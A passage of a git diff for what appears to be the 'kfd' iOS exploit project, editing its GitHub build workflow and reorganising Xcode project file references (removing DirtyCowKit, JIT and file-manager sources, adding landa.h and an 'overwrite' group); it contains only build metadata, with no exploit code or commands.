diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index 4fff95e8..cc040bbf 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -21,9 +21,6 @@ jobs: - name: Build IPA run: | - cd MiniRootFileManager15 - git apply -p1 ../submodule.patch - cd .. make - name: Upload IPA diff --git a/kfd.xcodeproj/project.pbxproj b/kfd.xcodeproj/project.pbxproj index 7e88be3f..9144ccd8 100644 --- a/kfd.xcodeproj/project.pbxproj +++ b/kfd.xcodeproj/project.pbxproj @@ -9,45 +9,18 @@ /* Begin PBXBuildFile section */ 297BA1092A310AE100D1E51A /* kfdApp.swift in Sources */ = {isa = PBXBuildFile; fileRef = 297BA1082A310AE100D1E51A /* kfdApp.swift */; }; 297BA10B2A310AE100D1E51A /* ContentView.swift in Sources */ = {isa = PBXBuildFile; fileRef = 297BA10A2A310AE100D1E51A /* ContentView.swift */; }; - 6E08ABFE2A9A3B9800BF5B0D /* helpers.m in Sources */ = {isa = PBXBuildFile; fileRef = 6E08ABFD2A9A3B9800BF5B0D /* helpers.m */; }; - 6E75BFA82A8475C70056ABDA /* fun.m in Sources */ = {isa = PBXBuildFile; fileRef = 6E75BFA72A8475C70056ABDA /* fun.m */; }; - 6E75BFAE2A847A980056ABDA /* offsets.m in Sources */ = {isa = PBXBuildFile; fileRef = 6E75BFAD2A847A980056ABDA /* offsets.m */; }; - 6ECE5B522A905FDE00792D41 /* proc.c in Sources */ = {isa = PBXBuildFile; fileRef = 6ECE5B512A905FDE00792D41 /* proc.c */; }; - D51A38002AB56ED900C147E2 /* IOKit.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = D58309A92A9BC38800828844 /* IOKit.framework */; }; - D51A38082AB56F8400C147E2 /* utils.m in Sources */ = {isa = PBXBuildFile; fileRef = D51A38022AB56F8400C147E2 /* utils.m */; }; - D51A38092AB56F8400C147E2 /* krw.c in Sources */ = {isa = PBXBuildFile; fileRef = D51A38032AB56F8400C147E2 /* krw.c */; }; - D51A380A2AB56F8400C147E2 /* vnode.m in Sources */ = {isa = PBXBuildFile; fileRef = D51A38052AB56F8400C147E2 /* vnode.m */; }; - D51A380B2AB56F8400C147E2 /* thanks_opa334dev_htrowii.m in Sources */ = {isa = PBXBuildFile; fileRef = D51A38062AB56F8400C147E2 /* thanks_opa334dev_htrowii.m */; }; - D51A380C2AB56F8400C147E2 /* cs_blobs.m in Sources */ = {isa = PBXBuildFile; fileRef = D51A38072AB56F8400C147E2 /* cs_blobs.m */; }; D51A38112AB5717500C147E2 /* files in Resources */ = {isa = PBXBuildFile; fileRef = D51A38102AB5717500C147E2 /* files */; }; - D52BA4622AB58212002E9836 /* DirtyCowKit in Frameworks */ = {isa = PBXBuildFile; productRef = D52BA4612AB58212002E9836 /* DirtyCowKit */; }; - D52BA4652AB582C9002E9836 /* SearchBar.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA4562AB5812A002E9836 /* SearchBar.swift */; }; - D52BA4662AB582C9002E9836 /* DirtyJITView.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA4572AB5812A002E9836 /* DirtyJITView.swift */; }; - D52BA4672AB582C9002E9836 /* AppsView.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA4582AB5812A002E9836 /* AppsView.swift */; }; - D52BA4692AB582C9002E9836 /* ApplicationManager.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA4512AB5812A002E9836 /* ApplicationManager.swift */; }; - D52BA46B2AB5866D002E9836 /* TextField++.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA46A2AB5866D002E9836 /* TextField++.swift */; }; - D52BA46D2AB586BF002E9836 /* Alert++.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA46C2AB586BF002E9836 /* Alert++.swift */; }; - D58653662ABBB60E005A2379 /* vm_unaligned_copy_switch_race.c in Sources */ = {isa = PBXBuildFile; fileRef = D58653622ABBB28D005A2379 /* vm_unaligned_copy_switch_race.c */; }; - D586547C2ABD508B005A2379 /* AXLocationBackgrounder.m in Sources */ = {isa = PBXBuildFile; fileRef = D58654582ABD508B005A2379 /* AXLocationBackgrounder.m */; }; - D586547D2ABD508B005A2379 /* ViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = D58654592ABD508B005A2379 /* ViewController.m */; }; - D586547E2ABD508B005A2379 /* SceneDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = D586545A2ABD508B005A2379 /* SceneDelegate.m */; }; - D586547F2ABD508B005A2379 /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = D586545B2ABD508B005A2379 /* LaunchScreen.storyboard */; }; - D58654802ABD508B005A2379 /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = D586545D2ABD508B005A2379 /* Main.storyboard */; }; - D58654812ABD508B005A2379 /* FileManager.m in Sources */ = {isa = PBXBuildFile; fileRef = D586545F2ABD508B005A2379 /* FileManager.m */; }; - D58654822ABD508B005A2379 /* kerneldec.cpp in Sources */ = {isa = PBXBuildFile; fileRef = D58654602ABD508B005A2379 /* kerneldec.cpp */; }; - D58654842ABD508B005A2379 /* AXNavigationController.m in Sources */ = {isa = PBXBuildFile; fileRef = D58654622ABD508B005A2379 /* AXNavigationController.m */; }; - D58654852ABD508B005A2379 /* AXFIle.m in Sources */ = {isa = PBXBuildFile; fileRef = D58654632ABD508B005A2379 /* AXFIle.m */; }; - D58654862ABD508B005A2379 /* AXFileViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = D58654652ABD508B005A2379 /* AXFileViewController.m */; }; - D58654872ABD508B005A2379 /* liblzfse.a in Frameworks */ = {isa = PBXBuildFile; fileRef = D58654662ABD508B005A2379 /* liblzfse.a */; }; - D58654882ABD508B005A2379 /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = D58654672ABD508B005A2379 /* AppDelegate.m */; }; - D58654892ABD508B005A2379 /* lzssdec.cpp in Sources */ = {isa = PBXBuildFile; fileRef = D58654682ABD508B005A2379 /* lzssdec.cpp */; }; - D586548A2ABD508B005A2379 /* patchfinder64.m in Sources */ = {isa = PBXBuildFile; fileRef = D58654692ABD508B005A2379 /* patchfinder64.m */; }; - D5AFB5B72ABE074C006266EA /* KFD-manager.m in Sources */ = {isa = PBXBuildFile; fileRef = D5AFB5B62ABE074C006266EA /* KFD-manager.m */; }; - D5AFB5BF2ABE1671006266EA /* LogView.swift in Sources */ = {isa = PBXBuildFile; fileRef = D5AFB5BE2ABE1671006266EA /* LogView.swift */; }; - D5AFB5C32ABE1691006266EA /* SwiftfulLoadingIndicators in Frameworks */ = {isa = PBXBuildFile; productRef = D5AFB5C22ABE1691006266EA /* SwiftfulLoadingIndicators */; }; - D5AFB5C52ABE1781006266EA /* Logger.swift in Sources */ = {isa = PBXBuildFile; fileRef = D5AFB5C42ABE1781006266EA /* Logger.swift */; }; - D5AFB71B2AC0252D006266EA /* grant_full_disk_access.m in Sources */ = {isa = PBXBuildFile; fileRef = D58653602ABBB28D005A2379 /* grant_full_disk_access.m */; }; - D5B87E8F2B00CC2E0024E70C /* FileManager.swift in Sources */ = {isa = PBXBuildFile; fileRef = D586507E2AB9F2AF005A2379 /* FileManager.swift */; }; + D57B521E2B46995800374989 /* fun.m in Sources */ = {isa = PBXBuildFile; fileRef = D57B520F2B46995700374989 /* fun.m */; }; + D57B52212B46995800374989 /* helpers.m in Sources */ = {isa = PBXBuildFile; fileRef = D57B52122B46995700374989 /* helpers.m */; }; + D57B52222B46995800374989 /* utils.m in Sources */ = {isa = PBXBuildFile; fileRef = D57B52132B46995700374989 /* utils.m */; }; + D57B52232B46995800374989 /* thanks_opa334dev_htrowii.m in Sources */ = {isa = PBXBuildFile; fileRef = D57B52142B46995700374989 /* thanks_opa334dev_htrowii.m */; }; + D57B52252B46995800374989 /* krw.c in Sources */ = {isa = PBXBuildFile; fileRef = D57B52162B46995700374989 /* krw.c */; }; + D57B52262B46995800374989 /* offsets.m in Sources */ = {isa = PBXBuildFile; fileRef = D57B52172B46995700374989 /* offsets.m */; }; + D57B52272B46995800374989 /* vnode.m in Sources */ = {isa = PBXBuildFile; fileRef = D57B52182B46995700374989 /* vnode.m */; }; + D57B52282B46995800374989 /* proc.c in Sources */ = {isa = PBXBuildFile; fileRef = D57B52192B46995700374989 /* proc.c */; }; + D5D2DD982B46A90A00B62BED /* vm_unaligned_copy_switch_race.c in Sources */ = {isa = PBXBuildFile; fileRef = D5D2DD962B46A90A00B62BED /* vm_unaligned_copy_switch_race.c */; }; + D5D2DD9B2B46A91B00B62BED /* grant_full_disk_access.m in Sources */ = {isa = PBXBuildFile; fileRef = D5D2DD9A2B46A91B00B62BED /* grant_full_disk_access.m */; }; + D5D2DD9D2B46AC3C00B62BED /* IOKit.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = D5D2DD9C2B46AC3C00B62BED /* IOKit.framework */; }; /* End PBXBuildFile section */ /* Begin PBXFileReference section */ @@ -68,81 +41,36 @@ 297BA1102A310AE200D1E51A /* Preview Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = "Preview Assets.xcassets"; sourceTree = ""; }; 29A358F32A43B53300C297A1 /* smith.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = smith.h; sourceTree = ""; }; 29A765292A393FCB006617E8 /* perf.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = perf.h; sourceTree = ""; }; - 6E08ABFD2A9A3B9800BF5B0D /* helpers.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = helpers.m; sourceTree = ""; }; - 6E08ABFF2A9A3BA600BF5B0D /* helpers.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = helpers.h; sourceTree = ""; }; - 6E75BFA72A8475C70056ABDA /* fun.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = fun.m; sourceTree = ""; }; - 6E75BFA92A8475D30056ABDA /* fun.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = fun.h; sourceTree = ""; }; - 6E75BFAC2A8476400056ABDA /* krw.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = krw.h; sourceTree = ""; }; - 6E75BFAD2A847A980056ABDA /* offsets.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = offsets.m; sourceTree = ""; }; - 6E75BFAF2A847AC50056ABDA /* offsets.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = offsets.h; sourceTree = ""; }; - 6ECE5B502A905FDE00792D41 /* proc.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = proc.h; sourceTree = ""; }; - 6ECE5B512A905FDE00792D41 /* proc.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = proc.c; sourceTree = ""; }; - 6ECE5B532A90609100792D41 /* utils.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = utils.h; sourceTree = ""; }; - 6ECE5B562A9065B300792D41 /* vnode.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = vnode.h; sourceTree = ""; }; 8C0AF3512A75B21A0065C9DD /* kread_IOSurface.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kread_IOSurface.h; sourceTree = ""; }; 8C0AF3522A75B2DA0065C9DD /* IOSurface_shared.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = IOSurface_shared.h; sourceTree = ""; }; 8CC7F5312A762D46004C6F30 /* kwrite_IOSurface.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kwrite_IOSurface.h; sourceTree = ""; }; - D51A38012AB56F8400C147E2 /* cs_blobs.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = cs_blobs.h; sourceTree = ""; }; - D51A38022AB56F8400C147E2 /* utils.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = utils.m; sourceTree = ""; }; - D51A38032AB56F8400C147E2 /* krw.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = krw.c; sourceTree = ""; }; - D51A38042AB56F8400C147E2 /* thanks_opa334dev_htrowii.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = thanks_opa334dev_htrowii.h; sourceTree = ""; }; - D51A38052AB56F8400C147E2 /* vnode.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = vnode.m; sourceTree = ""; }; - D51A38062AB56F8400C147E2 /* thanks_opa334dev_htrowii.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = thanks_opa334dev_htrowii.m; sourceTree = ""; }; - D51A38072AB56F8400C147E2 /* cs_blobs.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = cs_blobs.m; sourceTree = ""; }; D51A38102AB5717500C147E2 /* files */ = {isa = PBXFileReference; lastKnownFileType = folder; path = files; sourceTree = ""; }; - D52BA4352AB57EC9002E9836 /* DirtyCowKit */ = {isa = PBXFileReference; lastKnownFileType = wrapper; path = DirtyCowKit; sourceTree = ""; }; - D52BA4512AB5812A002E9836 /* ApplicationManager.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = ApplicationManager.swift; sourceTree = ""; }; - D52BA4562AB5812A002E9836 /* SearchBar.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = SearchBar.swift; sourceTree = ""; }; - D52BA4572AB5812A002E9836 /* DirtyJITView.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = DirtyJITView.swift; sourceTree = ""; }; - D52BA4582AB5812A002E9836 /* AppsView.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = AppsView.swift; sourceTree = ""; }; - D52BA46A2AB5866D002E9836 /* TextField++.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = "TextField++.swift"; sourceTree = ""; }; - D52BA46C2AB586BF002E9836 /* Alert++.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = "Alert++.swift"; sourceTree = ""; }; - D58309A92A9BC38800828844 /* IOKit.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; path = IOKit.framework; sourceTree = ""; }; - D586507E2AB9F2AF005A2379 /* FileManager.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = FileManager.swift; sourceTree = ""; }; - D58653602ABBB28D005A2379 /* grant_full_disk_access.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = grant_full_disk_access.m; sourceTree = ""; }; - D58653612ABBB28D005A2379 /* vm_unaligned_copy_switch_race.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = vm_unaligned_copy_switch_race.h; sourceTree = ""; }; - D58653622ABBB28D005A2379 /* vm_unaligned_copy_switch_race.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = vm_unaligned_copy_switch_race.c; sourceTree = ""; }; - D58653632ABBB28D005A2379 /* grant_full_disk_access.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = grant_full_disk_access.h; sourceTree = ""; }; - D58654392ABD508B005A2379 /* AXNavigationController.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = AXNavigationController.h; sourceTree = ""; }; - D586543A2ABD508B005A2379 /* lzfse_tunables.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = lzfse_tunables.h; sourceTree = ""; }; - D586543B2ABD508B005A2379 /* FileManager.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = FileManager.h; sourceTree = ""; }; - D58654512ABD508B005A2379 /* AppDelegate.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = ""; }; - D58654522ABD508B005A2379 /* lzfse_encode_tables.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = lzfse_encode_tables.h; sourceTree = ""; }; - D58654532ABD508B005A2379 /* AXFileViewController.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = AXFileViewController.h; sourceTree = ""; }; - D58654542ABD508B005A2379 /* AXFile.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = AXFile.h; sourceTree = ""; }; - D58654552ABD508B005A2379 /* patchfinder64.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = patchfinder64.h; sourceTree = ""; }; - D58654562ABD508B005A2379 /* lzfse_fse.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = lzfse_fse.h; sourceTree = ""; }; - D58654582ABD508B005A2379 /* AXLocationBackgrounder.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = AXLocationBackgrounder.m; sourceTree = ""; }; - D58654592ABD508B005A2379 /* ViewController.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = ViewController.m; sourceTree = ""; }; - D586545A2ABD508B005A2379 /* SceneDelegate.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = SceneDelegate.m; sourceTree = ""; }; - D586545C2ABD508B005A2379 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = ""; }; - D586545E2ABD508B005A2379 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = ""; }; - D586545F2ABD508B005A2379 /* FileManager.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = FileManager.m; sourceTree = ""; }; - D58654602ABD508B005A2379 /* kerneldec.cpp */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.cpp; path = kerneldec.cpp; sourceTree = ""; }; - D58654622ABD508B005A2379 /* AXNavigationController.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = AXNavigationController.m; sourceTree = ""; }; - D58654632ABD508B005A2379 /* AXFIle.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = AXFIle.m; sourceTree = ""; }; - D58654642ABD508B005A2379 /* kerneldec.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = kerneldec.h; sourceTree = ""; }; - D58654652ABD508B005A2379 /* AXFileViewController.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = AXFileViewController.m; sourceTree = ""; }; - D58654662ABD508B005A2379 /* liblzfse.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = liblzfse.a; sourceTree = ""; }; - D58654672ABD508B005A2379 /* AppDelegate.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = ""; }; - D58654682ABD508B005A2379 /* lzssdec.cpp */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.cpp; path = lzssdec.cpp; sourceTree = ""; }; - D58654692ABD508B005A2379 /* patchfinder64.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = patchfinder64.m; sourceTree = ""; }; - D586546A2ABD508B005A2379 /* kstruct.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = kstruct.h; sourceTree = ""; }; - D586546B2ABD508B005A2379 /* lzfse_internal.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = lzfse_internal.h; sourceTree = ""; }; - D586546C2ABD508B005A2379 /* lzfse.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = lzfse.h; sourceTree = ""; }; - D586546D2ABD508B005A2379 /* lzssdec.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = lzssdec.h; sourceTree = ""; }; - D586546F2ABD508B005A2379 /* AXLocationBackgrounder.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = AXLocationBackgrounder.h; sourceTree = ""; }; - D58654702ABD508B005A2379 /* ViewController.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = ViewController.h; sourceTree = ""; }; - D58654712ABD508B005A2379 /* SceneDelegate.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = SceneDelegate.h; sourceTree = ""; }; + D57B52062B46903600374989 /* landa.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = landa.h; sourceTree = ""; }; + D57B52092B46995700374989 /* thanks_opa334dev_htrowii.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = thanks_opa334dev_htrowii.h; sourceTree = ""; }; + D57B520A2B46995700374989 /* utils.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = utils.h; sourceTree = ""; }; + D57B520B2B46995700374989 /* vnode.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = vnode.h; sourceTree = ""; }; + D57B520C2B46995700374989 /* proc.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = proc.h; sourceTree = ""; }; + D57B520D2B46995700374989 /* offsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = offsets.h; sourceTree = ""; }; + D57B520E2B46995700374989 /* krw.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = krw.h; sourceTree = ""; }; + D57B520F2B46995700374989 /* fun.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = fun.m; sourceTree = ""; }; + D57B52122B46995700374989 /* helpers.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = helpers.m; sourceTree = ""; }; + D57B52132B46995700374989 /* utils.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = utils.m; sourceTree = ""; }; + D57B52142B46995700374989 /* thanks_opa334dev_htrowii.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = thanks_opa334dev_htrowii.m; sourceTree = ""; }; + D57B52162B46995700374989 /* krw.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = krw.c; sourceTree = ""; }; + D57B52172B46995700374989 /* offsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = offsets.m; sourceTree = ""; }; + D57B52182B46995700374989 /* vnode.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = vnode.m; sourceTree = ""; }; + D57B52192B46995700374989 /* proc.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = proc.c; sourceTree = ""; }; + D57B521A2B46995700374989 /* fun.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = fun.h; sourceTree = ""; }; + D57B521C2B46995700374989 /* helpers.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = helpers.h; sourceTree = ""; }; D586548D2ABD5112005A2379 /* kfd-Bridging-Header.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = "kfd-Bridging-Header.h"; sourceTree = ""; }; D58654902ABD55B3005A2379 /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; }; - D5AFB5B52ABE074C006266EA /* KFD-manager.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = "KFD-manager.h"; sourceTree = ""; }; - D5AFB5B62ABE074C006266EA /* KFD-manager.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = "KFD-manager.m"; sourceTree = ""; }; - D5AFB5BE2ABE1671006266EA /* LogView.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = LogView.swift; sourceTree = ""; }; - D5AFB5C02ABE167C006266EA /* ProcessCommunication */ = {isa = PBXFileReference; lastKnownFileType = wrapper; path = ProcessCommunication; sourceTree = ""; }; - D5AFB5C42ABE1781006266EA /* Logger.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = Logger.swift; sourceTree = ""; }; D5CB286E2AB5D02F009DF689 /* static_info.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = static_info.h; sourceTree = ""; }; D5CB286F2AB5D02F009DF689 /* dynamic_info.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = dynamic_info.h; sourceTree = ""; }; + D5D2DD962B46A90A00B62BED /* vm_unaligned_copy_switch_race.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = vm_unaligned_copy_switch_race.c; sourceTree = ""; }; + D5D2DD972B46A90A00B62BED /* vm_unaligned_copy_switch_race.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = vm_unaligned_copy_switch_race.h; sourceTree = ""; }; + D5D2DD992B46A91B00B62BED /* grant_full_disk_access.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = grant_full_disk_access.h; sourceTree = ""; }; + D5D2DD9A2B46A91B00B62BED /* grant_full_disk_access.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = grant_full_disk_access.m; sourceTree = ""; }; + D5D2DD9C2B46AC3C00B62BED /* IOKit.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = IOKit.framework; path = System/Library/Frameworks/IOKit.framework; sourceTree = SDKROOT; }; /* End PBXFileReference section */ /* Begin PBXFrameworksBuildPhase section */ @@ -150,10 +78,7 @@ isa = PBXFrameworksBuildPhase; buildActionMask = 2147483647; files = ( - D52BA4622AB58212002E9836 /* DirtyCowKit in Frameworks */, - D58654872ABD508B005A2379 /* liblzfse.a in Frameworks */, - D51A38002AB56ED900C147E2 /* IOKit.framework in Frameworks */, - D5AFB5C32ABE1691006266EA /* SwiftfulLoadingIndicators in Frameworks */, + D5D2DD9D2B46AC3C00B62BED /* IOKit.framework in Frameworks */, ); runOnlyForDeploymentPostprocessing = 0; }; @@ -190,6 +115,7 @@ children = ( 2948BA722A31636600B2ED3C /* physpuppet.h */, 29A358F32A43B53300C297A1 /* smith.h */, + D57B52062B46903600374989 /* landa.h */, ); path = puaf; sourceTree = ""; @@ -235,21 +161,14 @@ isa = PBXGroup; children = ( D58654902ABD55B3005A2379 /* Info.plist */, - D58654382ABD508B005A2379 /* filemanager_by_akusio */, - D52BA44F2AB5812A002E9836 /* JIT */, + 2965065E2A31565B0025D1A7 /* libkfd.h */, 2948BA6A2A3162C600B2ED3C /* libkfd */, - 6E75BFA62A8475790056ABDA /* fun */, D51A38102AB5717500C147E2 /* files */, - 297BA10C2A310AE200D1E51A /* Assets.xcassets */, - D5AFB5B62ABE074C006266EA /* KFD-manager.m */, - D5AFB5B52ABE074C006266EA /* KFD-manager.h */, - D586507E2AB9F2AF005A2379 /* FileManager.swift */, + D57B52072B46995700374989 /* overwrite */, 297BA10A2A310AE100D1E51A /* ContentView.swift */, - D5AFB5BE2ABE1671006266EA /* LogView.swift */, - D5AFB5C42ABE1781006266EA /* Logger.swift */, 297BA1082A310AE100D1E51A /* kfdApp.swift */, - 2965065E2A31565B0025D1A7 /* libkfd.h */, D586548D2ABD5112005A2379 /* kfd-Bridging-Header.h */, + 297BA10C2A310AE200D1E51A /* Assets.xcassets */, 297BA10F2A310AE200D1E51A /* Preview Content */, ); path = kfd; @@ -263,105 +182,41 @@ path = "Preview Content"; sourceTree = ""; }; - 6E75BFA62A8475790056ABDA /* fun */ = { - isa = PBXGroup; - children = ( - D58653602ABBB28D005A2379 /* grant_full_disk_access.m */, - D58653632ABBB28D005A2379 /* grant_full_disk_access.h */, - D58653622ABBB28D005A2379 /* vm_unaligned_copy_switch_race.c */, - D58653612ABBB28D005A2379 /* vm_unaligned_copy_switch_race.h */, - D51A38012AB56F8400C147E2 /* cs_blobs.h */, - D51A38072AB56F8400C147E2 /* cs_blobs.m */, - 6E75BFAC2A8476400056ABDA /* krw.h */, - D51A38032AB56F8400C147E2 /* krw.c */, - D51A38042AB56F8400C147E2 /* thanks_opa334dev_htrowii.h */, - D51A38062AB56F8400C147E2 /* thanks_opa334dev_htrowii.m */, - 6ECE5B532A90609100792D41 /* utils.h */, - D51A38022AB56F8400C147E2 /* utils.m */, - 6ECE5B562A9065B300792D41 /* vnode.h */, - D51A38052AB56F8400C147E2 /* vnode.m */, - 6E08ABFF2A9A3BA600BF5B0D /* helpers.h 